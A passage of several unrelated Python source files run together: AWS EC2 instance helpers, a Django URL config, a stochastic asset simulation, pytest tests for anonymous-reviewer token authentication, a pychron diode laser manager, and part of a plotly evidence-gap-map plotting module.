f"{instance_id}, {instance_type}, {instance_status}, {link_details}" ) return instances_status def stop_instance(instance_id): ec2_client = session.client("ec2") response = ec2_client.stop_instances(InstanceIds=[instance_id]) return response def terminate_instance(instance_id): ec2_client = session.client("ec2") response = ec2_client.terminate_instances(InstanceIds=[instance_id]) return response def create_key_pair(): ec2_client = session.client("ec2") key_pair = ec2_client.create_key_pair(KeyName=KEYNAME) private_key = key_pair["KeyMaterial"] # write private key to file with 400 permissions with os.fdopen( os.open("/tmp/aws_ec2_key.pem", os.O_WRONLY | os.O_CREAT, 0o400), "w+" ) as handle: handle.write(private_key) app/home/urls.py from django.urls import path from .views import DashboardView, IndexView urlpatterns = [ path("", IndexView.as_view(), name="home"), path("dashboard/", DashboardView.as_view(), name="dashboard"), ] example_models/stochastic_model.py # -*- coding: utf-8 -*- """ Created on Mon Mar 16 20:36:22 2020 @author: user """ from heavymodel import Model, Data import random import pandas as pd import seaborn as sns sns.set() rng = random.Random(0) # seed set to ensure replicable. 
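# --- create_key_pair() above writes the downloaded private key through
# os.fdopen(os.open(...)) so the file is *created* with 0o400 permissions,
# rather than being chmod-ed after it already exists. A small standalone sketch
# of that pattern; the path and key text are placeholders, and O_EXCL is added
# here so an existing file is never clobbered.
import os
import tempfile

def write_private_key(path: str, key_material: str) -> None:
    """Create `path` readable only by its owner and write the key into it."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o400)
    with os.fdopen(fd, 'w') as handle:
        handle.write(key_material)

if __name__ == '__main__':
    demo_path = os.path.join(tempfile.mkdtemp(), 'demo_key.pem')
    write_private_key(demo_path, '-----BEGIN RSA PRIVATE KEY-----\n...\n')
    # Typically prints 0o400 (umask permitting).
    print(oct(os.stat(demo_path).st_mode & 0o777))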
class Asset(Model): def asset_value(self, t): if t == 0: return self.initial_fund else: return self.asset_value(t-1) * (1 + self.inv_growth(t)) def inv_growth(self, t): return rng.normalvariate(self.mu, self.sigma) data = Data(dict(mu=0.04, sigma=0.06, initial_fund=1000)) simulations = 1000 results = [] for count, sim in enumerate(range(simulations)): asset = Asset(data=data) asset._run(61) results.append(asset.asset_value(60)) result_df = pd.DataFrame(data={"asset_value":results}) sns.kdeplot(result_df["asset_value"]) import pytest from gtmcore.configuration import Configuration from gtmcore.fixtures.auth import mock_config_file_with_auth_anon_review, mock_config_file_with_auth_multi_anon_review from gtmcore.auth.identity import get_identity_manager_class, AuthenticationError from gtmcore.auth.anon_review import AnonymousReviewIdentityManager from gtmcore.auth import User class TestIdentityAnonReview(object): def test_is_session_valid(self, mock_config_file_with_auth_anon_review): """test check for valid session""" config = Configuration() # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secret = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Invalid with no token assert mgr.is_token_valid() is False assert mgr.is_token_valid(None) is False # Junk base64 encoded data should be False too assert mgr.is_token_valid("") is False # A proper "anonymous" bearer token will be considered valid assert mgr.is_token_valid(anon_review_secret) is True def test_is_authenticated_token(self, mock_config_file_with_auth_anon_review): """test checking if we have the right token""" config = Configuration() # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secret = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Invalid with no token assert mgr.is_authenticated() is False assert mgr.is_authenticated(None) is False assert mgr.is_authenticated(anon_review_secret) is True def test_get_anon_user_profile(self, mock_config_file_with_auth_anon_review): """test getting a user profile when anonymous""" config = Configuration() # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secret = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Load User with pytest.raises(AuthenticationError): # Should fail without a token mgr.get_user_profile() # Load User u = mgr.get_user_profile(anon_review_secret) assert type(u) == User assert u.username == "anonymous1" assert u.email == "" assert u.given_name == "Anonymous" assert u.family_name == "Reviewer-1" def test_get_multi_anon_user_profile(self, mock_config_file_with_auth_multi_anon_review): """test getting a user profile when anonymous""" config = Configuration(mock_config_file_with_auth_multi_anon_review) # We grab the string that was used to configure the AnonymousReviewIdentityManager anon_review_secrets = config.config['anon_review_secret'] mgr = get_identity_manager_class(config)(config) assert type(mgr) == AnonymousReviewIdentityManager # Load User with pytest.raises(AuthenticationError): # Should fail without a token mgr.get_user_profile() # Load Users for i, secret in enumerate(anon_review_secrets): u = mgr.get_user_profile(secret) assert type(u) == User assert u.username == 
f"anonymous{i+1}" assert u.email == "" assert u.given_name == "Anonymous" assert u.family_name == f"Reviewer-{i+1}" # =============================================================================== # Copyright 2011 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # =============enthought library imports======================= from __future__ import absolute_import from threading import Timer from traits.api import Instance, Button, Bool, Float from traitsui.api import VGroup, Item, InstanceEditor from .fusions_laser_manager import FusionsLaserManager from pychron.hardware.fusions.fusions_diode_logic_board import FusionsDiodeLogicBoard from pychron.hardware.mikron_pyrometer import MikronGA140Pyrometer from pychron.hardware.pyrometer_temperature_monitor import PyrometerTemperatureMonitor from pychron.hardware.temperature_monitor import DPi32TemperatureMonitor from pychron.hardware.watlow.watlow_ezzone import WatlowEZZone from pychron.lasers.laser_managers.vue_metrix_manager import VueMetrixManager from pychron.monitors.fusions_diode_laser_monitor import FusionsDiodeLaserMonitor from pychron.response_recorder import ResponseRecorder class FusionsDiodeManager(FusionsLaserManager): """ """ stage_manager_id = 'fusions.diode' id = 'pychron.fusions.diode' # name = 'fusions_diode' name = 'FusionsDiode' configuration_dir_name = 'fusions_diode' pyrometer = Instance(MikronGA140Pyrometer) temperature_controller = Instance(WatlowEZZone) temperature_monitor = Instance(DPi32TemperatureMonitor) control_module_manager = Instance(VueMetrixManager) pyrometer_temperature_monitor = Instance(PyrometerTemperatureMonitor) tune = Button configure = Button tuning = Bool # laser_measured_power = Float # thermocouple_temp = Float # update_timers = List monitor_name = 'diode_laser_monitor' monitor_klass = FusionsDiodeLaserMonitor use_power_slider = Bool(True) request_power = Float request_powermin = Float(0) request_powermax = Float(1500) # dbname = paths.diodelaser_db # db_root = paths.diodelaser_db_root use_calibrated_temperature = Bool(False) def _use_calibrated_temperature_changed(self, new): if self.temperature_controller: self.temperature_controller.use_calibrated_temperature = new def map_temperature(self, v): # if self.use_calibrated_temperature: v = self.temperature_controller.map_temperature(v) return v def get_pyrometer_temperature(self, **kw): """ """ return self._try('pyrometer', 'read_temperature', kw) def get_laser_internal_temperature(self, **kw): """ """ return self._try('control_module_manager', 'get_internal_temperature', kw) def get_power_slider(self): return None def get_lens_configuration_group(self): return None def load_lens_configurations(self): pass def emergency_shutoff(self, *args, **kw): super(FusionsDiodeManager, self).emergency_shutoff(*args, **kw) self.control_module_manager.disable() self.temperature_controller.set_control_mode('open') self.temperature_controller.set_open_loop_setpoint(0.0) def set_laser_output(self, 
value, units): self.debug('set laser output value={} units={}'.format(value, units)) if units == 'temp': self.set_laser_temperature(value) else: self.set_laser_power(value, units) def set_laser_temperature(self, temp, set_pid=True): return self._set_laser_power_hook(temp, mode='closed', set_pid=set_pid) # use_calibration=self.use_calibrated_temperature) # =============================================================================== # private # =============================================================================== def _set_laser_power_hook(self, power, mode='open', set_pid=True, **kw): tc = self.temperature_controller if tc.control_mode != mode: tc.set_control_mode(mode) power = float(power) if mode == 'closed' and set_pid and power: tc.set_pid(power) func = getattr(tc, 'set_{}_loop_setpoint'.format(mode)) func(power, set_pid=set_pid, **kw) def _enable_hook(self, clear_setpoint=True): if super(FusionsDiodeManager, self)._enable_hook(): # logic board sucessfully enabled if clear_setpoint: # disable the temperature_controller unit a value is set self.temperature_controller.disable() self.response_recorder.start('diode_response_tc_control') if self.pyrometer: self.pyrometer.start_scan() return self.control_module_manager.enable() def _disable_hook(self): self.response_recorder.stop() self.temperature_controller.disable() self.control_module_manager.disable() if self.pyrometer: self.pyrometer.stop_scan() return super(FusionsDiodeManager, self)._disable_hook() def _try(self, obj, func, kw): try: obj = getattr(self, obj) func = getattr(obj, func) return func(**kw) except AttributeError: pass # =============================================================================== # views # =============================================================================== def get_additional_controls(self): # v = Group( gs = [VGroup(Item('temperature_controller', style='custom', editor=InstanceEditor(view='control_view'), show_label=False, ), label='Watlow'), VGroup(Item('pyrometer', show_label=False, style='custom'), label='Pyrometer'), VGroup(Item('control_module_manager', show_label=False, style='custom'), label='ControlModule'), VGroup(Item('fiber_light', style='custom', show_label=False), label='FiberLight')] return gs # =============================================================================== # defaults # =============================================================================== def _response_recorder_default(self): r = ResponseRecorder(response_device=self.temperature_controller, # response_device_secondary = self.temperature_monitor, response_device_secondary=self.pyrometer, output_device=self.temperature_controller) return r def _temperature_monitor_default(self): tm = DPi32TemperatureMonitor(name='temperature_monitor', configuration_dir_name=self.configuration_dir_name) return tm def _pyrometer_default(self): p = MikronGA140Pyrometer(name='pyrometer', configuration_dir_name=self.configuration_dir_name) return p def _laser_controller_default(self): b = FusionsDiodeLogicBoard(name='laser_controller', configuration_name='laser_controller', configuration_dir_name=self.configuration_dir_name) return b def _stage_manager_default(self): args = dict(name='stage', configuration_name='stage', configuration_dir_name=self.configuration_dir_name, parent=self) return self._stage_manager_factory(args) def _temperature_controller_default(self): w = WatlowEZZone(name='temperature_controller', use_calibrated_temperature=self.use_calibrated_temperature, 
configuration_dir_name=self.configuration_dir_name) return w def _pyrometer_temperature_monitor_default(self): py = PyrometerTemperatureMonitor(name='pyrometer_tm', configuration_dir_name=self.configuration_dir_name) return py def _title_default(self): return 'Diode Manager' def _control_module_manager_default(self): v = VueMetrixManager() # control = self.control_module) return v if __name__ == '__main__': from pychron.core.helpers.logger_setup import logging_setup from pychron.envisage.initialization.initializer import Initializer logging_setup('fusions diode') f = FusionsDiodeManager() f.use_video = True f.record_brightness = True ini = Initializer() a = dict(manager=f, name='FusionsDiode') ini.add_initialization(a) ini.run() # f.bootstrap() f.configure_traits() # ======================= EOF ============================ # def finish_loading(self): # super(FusionsDiodeManager, self).finish_loading() # # self.pyrometer.start_scan() # # self.control_module_manager.start_scan() # def open_scanner(self): # from pychron.lasers.scanner import PIDScanner # # self._open_scanner(PIDScanner, 'scanner.yaml') # # def open_autotuner(self): # from pychron.lasers.autotuner import AutoTuner # # self._open_scanner(AutoTuner, 'autotuner.yaml') # # def _open_scanner(self, klass, name): # from pychron.lasers.scanner import ScannerController # # p = os.path.join(paths.scripts_dir, name) # # s = klass(control_path=p, # manager=self # ) # # tc = self.temperature_controller # tm = self.get_device('temperature_monitor') # # def tc_gen(): # while 1: # pr = tc.get_temp_and_power(verbose=False) # for pi in pr.data: # yield pi # # # populate scanner with functions # gen = tc_gen() # s.setup(directory='diode_autotune_scans') # s.new_function(gen, name='Temp. Pyrometer (C)') # s.new_function(gen, name='Power (%)') # # if tm is not None: # func = partial(tm.read_temperature, verbose=False) # s.new_function(func, name='Reflector Temp (C)') # # # bind to request_power change. set Setpoint static value # s.new_static_value('Setpoint') # self.on_trait_change(lambda v: s.set_static_value('Setpoint', v), self._requested_power) # # # bind to Scanner's stop_event. Set laser power to 0. 
# s.on_trait_change(lambda: self.set_laser_temperature(0), 'stop_event') # # # bind to Scanners setpoint # # s.on_trait_change(lambda v: self.set_laser_temperature(v), 'setpoint') # # sc = ScannerController(model=s, # application=self.application) # self.open_view(sc) # def bind_preferences(self, pref_id): # super(FusionsDiodeManager, self).bind_preferences(pref_id) # bind_preference(self, 'use_calibrated_temperature', '{}.use_calibrated_temperature'.format(pref_id)) # def get_laser_amps(self): # ''' # ''' # return self.control_module.read_laser_amps() # # def get_laser_current(self): # ''' # ''' # return self.control_module.read_laser_current_adc() # def get_laser_power(self): # ''' # ''' # return self.control_module.read_laser_power_adc() # # def get_measured_power(self): # ''' # ''' # return self.control_module.read_measured_power() # def disable_laser(self): # ''' # ''' # if self.fiber_light.auto_onoff and not self.fiber_light.state: # self.fiber_light.power_on() # # self.temperature_controller.disable() # self.control_module_manager.disable() # # super(FusionsDiodeManager, self).disable_laser() # # return True # def get_degas_manager(self): # from degas_manager import DegasManager # # # path = self.open_file_dialog(default_directory = os.path.join(scripts_dir, # # 'laserscripts', # # 'degas' # # ) # # ) # # path = '/Users/pychron/Pychrondata_beta/scripts/laserscripts/degas/puck1.rs' # if path: # dm = DegasManager() # dm.parent = self # dm.file_name = path # dm.new_script() # return dm # def launch_camera_scan(self): # ''' # ''' # p = os.path.join(paths.scripts_dir, 'laserscripts', 'camera_scans') # cs = CameraScanScript(manager = self, parent_path = p) # cs.open() # # def launch_power_scan(self): # ''' # overriding super # ''' # p = os.path.join(paths.scripts_dir, 'laserscripts', 'diode_power_scans') # ps = DiodePowerScanScript(manager = self, parent_path = p) # ps.open() # def show_image_process(self): # ''' # ''' # # vm = self.video_manager # p = os.path.join(paths.data_dir, 'video', 'testframe.png') # vm.process_frame(path=p) # vm.edit_traits(view='image_view') # def show_step_heater(self): # # shm = StepHeatManager(laser_manager = self, # video_manager = self.stage_manager.video_manager # ) # shm.edit_traits() # def show_pyrometer_calibration_manager(self): # ''' # ''' # c = CalibrationManager(diode_manager = self, # style = 'pyrometer') # c.open() # # def show_calibration_manager(self): # ''' # ''' # # c = CalibrationManager(diode_manager = self) # c.open() # @on_trait_change('configure') # def _show_temperature_controller_configuration(self): # ''' # ''' # self.temperature_controller.edit_traits(view='configure_view') # def __watlow__group__(self): # ''' # ''' # return VGroup(Item('temperature_controller', style = 'custom', show_label = False), # label = 'Watlow', # show_border = True) # # def __pyrometer__group__(self): # ''' # ''' # return VGroup(Item('pyrometer', show_label = False, style = 'custom'), # show_border = True, # label = 'Pyrometer') # def show_streams(self): # ''' # ''' # # tc = self.temperature_controller # pyro = self.pyrometer # tm = self.pyrometer_temperature_monitor # apm = self.analog_power_meter # ipm = self.control_module # # # avaliable_streams = [apm, pyro, tc, tm, ipm] # @on_trait_change('tune') # def _tune_temperature_controller(self): # ''' # ''' # if not self.tuning: # tune = TuneThread(self) # tune.setDaemon(1) # tune.start() # # self.tuning = not self.tuning # @on_trait_change('calibrate') # def _calibrate_power(self): # ''' # ''' # # cm = 
CalibrationManager(parent = self) # cm._calibrate_() # cm.edit_traits(kind = 'livemodal') # def _devices_default(self): # ''' # ''' # return [self.pyrometer, # self.temperature_controller, # self.temperature_monitor, # self.analog_power_meter, # self.logic_board, # self.control_module, # self.stage_controller] # def launch_power_profile(self): # ''' # ''' # self.logger.info('launching power profile') # # sm = self.stream_manager # tc = self.temperature_controller # pyro = self.pyrometer # stm = self.stage_manager # apm = self.analog_power_meter # # self.raster_manager = rm = RasterManager(stream_manager = sm) # # if not stm.centered: # self.warning('Please set a center position') # # return # p=os.path.join(preferences.root,'laserscripts','beamprofile.txt') # pt = BeamProfileThread(self,p) # rm.set_canvas_parameters(pt.steps, pt.steps) # # if sm.open_stream_loader([pyro, tc, apm]): # self.dirty = True # # #setup the data frame # dm = sm.data_manager # if not self.streaming: # self.streaming = True # # dm.add_group('molectron') # for i in range(10): # dm.add_group('row%i' % i, parent = 'root.molectron') # for j in range(10): # dm.add_group('cell%i%i' % (i, j), parent = 'root.molectron.row%i' % i) # dm.add_table('power', parent = 'root.molectron.row%i.cell%i%i' % (i, i, j)) # # #stm.edit_traits(kind = 'livemodal') # pt.center_x = stm.center_x # pt.center_y = stm.center_y # # pt.start() # rm.edit_traits() # def get_calibration_menu(self): # d = super(FusionsDiodeManager, self).get_calibration_menu() # dn = d[1] + [#dict(name='Calibrate',action='show_calibration_manager'), # dict(name = 'Calibrate Pyrometer', action = 'show_pyrometer_calibration_manager'), # dict(name = 'Camera Scan', action = 'launch_camera_scan'), # dict(name = 'Image Process', action = 'show_image_process') # ] # return (d[0], dn) # def get_control_buttons(self): # ''' # ''' # v = super(FusionsDiodeManager, self).get_control_buttons() # return v + [('pointer', None, None), # #('enable', None, None), # #('interlock', None, None) # ] # def get_menus(self): # ''' # ''' # m = super(FusionsDiodeManager, self).get_menus() # # # # m += [('Calibration', [ # dict(name = 'Tune', action = '_tune_temperature_controller'), # dict(name = 'Calibrate', action = '_calibrate_power'), # #dict(name='Open Graph',action='_open_graph'), # dict(name = 'Power Profile', action = 'launch_power_profile'), # ] # ), # # # ('Streams', [dict(name = 'Stop', action = 'stop_streams', enabled_when = 'streaming'), # # dict(name = 'Stream ...', action = '_launch_stream'), # # dict(name='Save Graph ...', action ='_save_graph', enabled_when='dirty') # # ]) # ] # return m # def show_stats_view(self): # ''' # ''' # # self.timer = t = Timer(1000, self._update_stats) # self.update_timers.append(t) # self.outputfile = open(os.path.join(paths.data_dir, 'laser_stats.txt'), 'w') # self.outputfile.write('time\tlaser power\tmeasured power\tlaser_current\tlaser amps\n') # # self.edit_traits(view = 'stats_view') # # def _update_stats(self): # ''' # ''' # self.laser_power = lp = self.get_laser_power() # self.laser_measured_power = lm = self.get_measured_power() # self.laser_current = lc = self.get_laser_current() # self.laser_amps = la = self.get_laser_amps() # self.outputfile.write('%s\n' % '\t'.join(('%0.3f' % time.time(), '%s' % lp, '%s' % lm, '%s' % lc, '%s' % la))) # # def _request_amps_changed(self): # ''' # ''' # self.control_module.set_request_amps(self.request_amps) # # def stats_view(self): # ''' # ''' # v = View(VGroup(Item('request_amps'), # Item('laser_power'), # 
Item('laser_measured_power'), # Item('laser_current'), # Item('laser_amps'), # ), # resizable = True, # handler = UpdateHandler # ) # return v import numpy as np import pandas as pd import random def evidencegapmap(dataset, x_column, y_column, xy_column=None, bubble_column=None, bubble_text=None, bubble_link=None, time_column=None, size_column=None, color_column=None, xbin_list=None, ybin_list=None,xbin_size=100, ybin_size=100, x_title=None, y_title=None, title=None, colorbar_title=None, scale_bubble=10, colorscale=None, marker_opacity=None, marker_border_width=None,show_slider=True, show_button=True, show_colorbar=True, show_legend=None, width=None, height=None): ''' Makes the animated and interactive bubble charts from a given dataset.''' # Initialize the number of bins xbin_range = [0,(len(xbin_list)-1)] ybin_range = [0,(len(ybin_list)-1)] #Initialize Axes range x_range=[0,0] y_range=[0,0] # Set category_column as None and update it as color_column only in case # color_column is not None and categorical, in which case set color_column as None category_column = None if color_column: # Can be numerical or categorical if dataset[color_column].dtype.name in ['category', 'object', 'bool']: category_column = color_column color_column = None # Set the plotting mode for the plots inside a cell if xy_column : mode = 'nlpmode' xmax = max(map(lambda xy: xy[0], list(dataset[xy_column]))) xmin = min(map(lambda xy: xy[0], list(dataset[xy_column]))) ymax = max(map(lambda xy: xy[1], list(dataset[xy_column]))) ymin = min(map(lambda xy: xy[1], list(dataset[xy_column]))) xshift = (xmax + xmin)/2 yshift = (ymax + ymin)/2 xy_scale= max(xmax-xmin, ymax-ymin) #print("xmax {}, xmin {}, ymax {}, ymin {}, xshift {}, yshift {} xy_scale {}".format(xmax, xmin, ymax, ymin, xshift, yshift, xy_scale)) else : mode = 'randommode' xy_scale = 1 xshift=yshift =0 # Set the variables for making the grid if time_column: years = dataset[time_column].unique() else: years = None show_slider = False show_button = False column_names = [x_column, y_column] column_names.append(bubble_column) if xy_column: column_names.append(xy_column) if bubble_text: column_names.append(bubble_text) if bubble_link: column_names.append(bubble_link) if size_column: column_names.append(size_column) if color_column: column_names.append(color_column) # Make the grid if category_column: categories = dataset[category_column].unique() col_name_template = '{}+{}+{}_grid' grid = make_grid_with_categories(dataset, column_names, time_column, category_column, years, categories) if show_legend is None: showlegend = True else: showlegend = show_legend # Set the layout if show_slider: slider_scale = years else: slider_scale = None figure, sliders_dict = set_layout(x_title, y_title, title, show_slider, slider_scale, show_button, showlegend, width, height) if size_column: sizeref = 2.*max(dataset[size_column])/(scale_bubble**2) # Set the reference size for the bubbles else: sizeref = None # Add the frames if category_column: # Add the base frame for category in categories: if time_column: year = min(years) # The earliest year for the base frame col_name_template_year = col_name_template.format(year, {}, {}) else: col_name_template_year = '{}+{}_grid' trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column,bubble_text, bubble_link, size_column, sizeref, scale_bubble, marker_opacity, marker_border_width, mode=mode,category=category, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) 
figure['data'].append(trace) # Add time frames if time_column: # Only if time_column is not None for year in years: frame = {'data': [], 'name': str(year)} for category in categories: col_name_template_year = col_name_template.format(year, {}, {}) trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column, bubble_text, bubble_link, size_column, sizeref, scale_bubble, marker_opacity, marker_border_width ,mode=mode, category=category, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) frame['data'].append(trace) figure['frames'].append(frame) if show_slider: add_slider_steps(sliders_dict, year) else: # Add the base frame if time_column: year = min(years) # The earliest year for the base frame col_name_template_year = col_name_template.format(year, {}) else: col_name_template_year = '{}_grid' trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column, bubble_text, bubble_link, size_column, sizeref, scale_bubble, marker_opacity, marker_border_width, color_column, colorscale, show_colorbar, colorbar_title, mode=mode, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) figure['data'].append(trace) # Add time frames if time_column: # Only if time_column is not None for year in years: col_name_template_year = col_name_template.format(year, {}) frame = {'data': [], 'name': str(year)} trace = get_trace(grid, col_name_template_year, x_column, y_column, xy_column, bubble_column, bubble_text, bubble_link,size_column, sizeref, scale_bubble, marker_opacity, marker_border_width, color_column, colorscale, show_colorbar, colorbar_title, mode=mode, xsize=xbin_size, ysize=ybin_size, xy_scale=xy_scale, xshift=xshift, yshift=yshift) frame['data'].append(trace) figure['frames'].append(frame) if show_slider: add_slider_steps(sliders_dict, year) # Set ranges for the axes x_range = set_range(dataset[x_column], xbin_size) y_range = set_range(dataset[y_column], ybin_size) figure['layout']['xaxis']['range'] = x_range figure['layout']['yaxis']['range'] = y_range if show_slider: figure['layout']['sliders'] = [sliders_dict] tracepoint = draw_evidence_gap_map_structure_horzero(xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) for i in range(len(ybin_list)+1): tracepoint = draw_evidence_gap_map_structure_hor(i, xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) tracepoint = draw_evidence_gap_map_structure_verzero(xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) for i in range(len(xbin_list)+1): tracepoint = draw_evidence_gap_map_structure_ver(i, xbin_list,ybin_list,xbin_size,ybin_size ) figure['data'].append(tracepoint) return figure def draw_evidence_gap_map_structure_horzero(x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_horizontals_zero= { 'x': [int((xbin/2)+i*(xbin)) for i in range(number_of_xcats)], 'y': [0 for i in range(number_of_xcats)], 'text': [x_list[line] for line in range(number_of_xcats)], 'mode': 'lines+text', 'textposition': 'bottom center', 'showlegend': False } return draw_horizontals_zero def draw_evidence_gap_map_structure_hor(linenum=1, x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_horizontals = { 'x': [int(i*xbin) for i in range(number_of_xcats+1)], 'y': [int(linenum*(ybin)) for i in range(number_of_xcats+1)], 'text': "", 'mode': 'lines', 'showlegend': False } return 
draw_horizontals def draw_evidence_gap_map_structure_verzero(x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_verticals_zero= { 'x': [0 for i in range(number_of_ycats)], 'y': [int((ybin/2)+i*(ybin)) for i in range(number_of_ycats)], 'text': [y_list[line] for line in range(number_of_ycats)], 'mode': 'lines+text', 'textposition': 'middle left', 'showlegend': False } return draw_verticals_zero def draw_evidence_gap_map_structure_ver(linenum=1, x_list=None, y_list=None,xbin=100, ybin=100): number_of_xcats = len(x_list) number_of_ycats = len(y_list) draw_verticals = { 'x': [int(linenum*(xbin)) for i in range(number_of_ycats+1)], 'y': [int(i*ybin) for i in range(number_of_ycats+1)], 'text': "", 'mode': 'lines', 'showlegend': False } return draw_verticals def make_grid_with_categories(dataset, column_names, time_column, category_column, years=None, categories=None): '''Makes the grid for the plot as a pandas DataFrame.''' grid = pandas.DataFrame() if categories is None: categories = dataset[category_column].unique() if time_column: col_name_template = '{}+{}+{}_grid' if years is None: years = dataset[time_column].unique() for year in years: for category in categories: dataset_by_year_and_cat = dataset[(dataset[time_column] == int(year)) & (dataset[category_column] == category)] for col_name in column_names: # Each column name is unique temp = col_name_template.format(year, col_name, category) if dataset_by_year_and_cat[col_name].size != 0: grid = grid.append({'value': list(dataset_by_year_and_cat[col_name]), 'key': temp}, ignore_index=True) else: col_name_template = '{}+{}_grid' for category in categories: dataset_by_cat = dataset[(dataset[category_column] == category)] for col_name in column_names: # Each column name is unique temp = col_name_template.format(col_name, category) if dataset_by_cat[col_name].size != 0: grid = grid.append({'value': list(dataset_by_cat[col_name]), 'key': temp}, ignore_index=True) return grid def set_layout(x_title=None, y_title=None, title=None, show_slider=True, slider_scale=None, show_button=True, show_legend=False, width=None, height=None): '''Sets the layout for the figure.''' # Define the figure object as a dictionary figure = { 'data': [], 'layout': {}, 'frames': [] } # Start with filling the layout first figure = set_2Daxes(figure, x_title, y_title) figure['layout']['title'] = title figure['layout']['hovermode'] = 'closest' figure['layout']['showlegend'] = show_legend figure['layout']['margin'] = dict(l=60, b=50, t=50, r=60, pad=10) if width: figure['layout']['width'] = width if height: figure['layout']['height'] = height # Add slider for the time scale if show_slider: sliders_dict = add_slider(figure, slider_scale) else: sliders_dict = {} # Add a pause-play button if show_button: add_button(figure) # Return the figure object return figure, sliders_dict def set_2Daxes(figure, x_title=None, y_title=None): '''Sets 2D axes''' figure['layout']['xaxis'] = {'title': x_title, 'autorange': False, 'showgrid': False, 'zeroline': False, 'showline': False, 'ticks': '', 'showticklabels': False, 'automargin': True} figure['layout']['yaxis'] = {'title': y_title, 'autorange': False, 'showgrid': False, 'zeroline': False, 'showline': False, 'ticks': '', 'showticklabels': False, 'automargin': True} return figure def add_slider(figure, slider_scale): '''Adds slider for animation''' figure['layout']['sliders'] = { 'args': [ 'slider.value', { 'duration': 400, 'ease': 'cubic-in-out' } ], 'initialValue': min(slider_scale), 
'plotlycommand': 'animate', 'values': slider_scale, 'visible': True } sliders_dict = { 'active': 0, 'yanchor': 'top', 'xanchor': 'left', 'currentvalue': { 'font': {'size': 20}, 'prefix': 'Year:', 'visible': True, 'xanchor': 'right' }, 'transition': {'duration': 300, 'easing': 'cubic-in-out'}, 'pad': {'b': 10, 't': 50}, 'len': 0.9, 'x': 0.1, 'y': 0, 'steps': [] } return sliders_dict def add_slider_steps(sliders_dict, year): '''Adds the slider steps.''' slider_step = {'args': [ [year], {'frame': {'duration': 300, 'redraw': False}, 'mode': 'immediate', 'transition': {'duration': 300}} ], 'label': str(year), 'method': 'animate'} sliders_dict['steps'].append(slider_step) def add_button(figure): '''Adds the pause-play button for animation''' figure['layout']['updatemenus'] = [ { 'buttons': [ { 'args': [None, {'frame': {'duration': 500, 'redraw': False}, 'fromcurrent': True, 'transition': {'duration': 300, 'easing': 'quadratic-in-out'}}], 'label': 'Play', 'method': 'animate' }, { 'args': [[None], {'frame': {'duration': 0, 'redraw': False}, 'mode': 'immediate', 'transition': {'duration': 0}}], 'label': 'Pause', 'method': 'animate' } ], 'direction': 'left', 'pad': {'r': 10, 't': 87}, 'showactive': False, 'type': 'buttons', 'x': 0.1, 'xanchor': 'right', 'y': 0, 'yanchor': 'top' } ] def set_range(values, size): ''' Finds the axis range for the figure.''' rmin = int(min([return_xbin_cords(x, size) for x in values]))-size/2 rmax = int(max([return_xbin_cords(x, size) for x in values]))+size/2 return [rmin, rmax] # To be used later when individual Risk Factos can be plotted def return_xbin_cords(x_binnum, sizebin): # generate some random integers to fit in the research papers in a cell values = random.randint((-sizebin/2+5),(sizebin/2-5)) #Plots start at (0, 0) xbin_cords = sizebin/2 + (x_binnum*sizebin) + values return int(xbin_cords) # To be used later when individual Risk Factos can be plotted def return_ybin_cords(y_binnum, sizebin): # generate some random integers to fit in the research papers in a cell values = random.randint((-sizebin/2+5),sizebin/2-5) #Plots start at (0, 0) ybin_cords = sizebin/2 + (y_binnum*sizebin) + values return int(ybin_cords) # To be used later when individual Risk Factos can be plotted def return_xy_cords_nlp(a, xy, sizebin, axes, scale, shift): if axes=='x': margin = 10 # generate some random integers to fit in the research papers in a cell # remove a margin of 10 from the size of bin so effectively available size is 90 if bin is 100 values = ((xy[0]-shift)/scale)*(sizebin - 10) #Plots start at (0, 0) x_cords = sizebin/2 + (a*sizebin) + values return int(x_cords) else : # generate some random integers to fit in the research papers in a cell # remove a margin of 10 from the size of bin so effectively available size is 90 if bin is 100 values = ((xy[1]-shift)/scale)*(sizebin - 10) #Plots start at (0, 0) y_cords = sizebin/2 + (a*sizebin) + values return int(y_cords) def return_text_by_category_in_bin(grid,category,xbinnum,ybinnum,template, xcol, ycol, column, bubbletext, link, size): indicesx=[] indicesy=[] for idx, row in grid[grid['key'].str.contains(category)].iterrows(): if row['key']==template.format(xcol, category): for i, xx in enumerate(row['value']): if (xx==xbinnum): indicesx.append(i) if row['key']==template.format(ycol, category): for i, yy in enumerate(row['value']): if (yy==ybinnum): indicesy.append(i) matchindex = list(set(indicesx) & set(indicesy)) textoverall=[] textcol=[] texttext=[] textlink=[] textrelevance=[] for idx, row in 
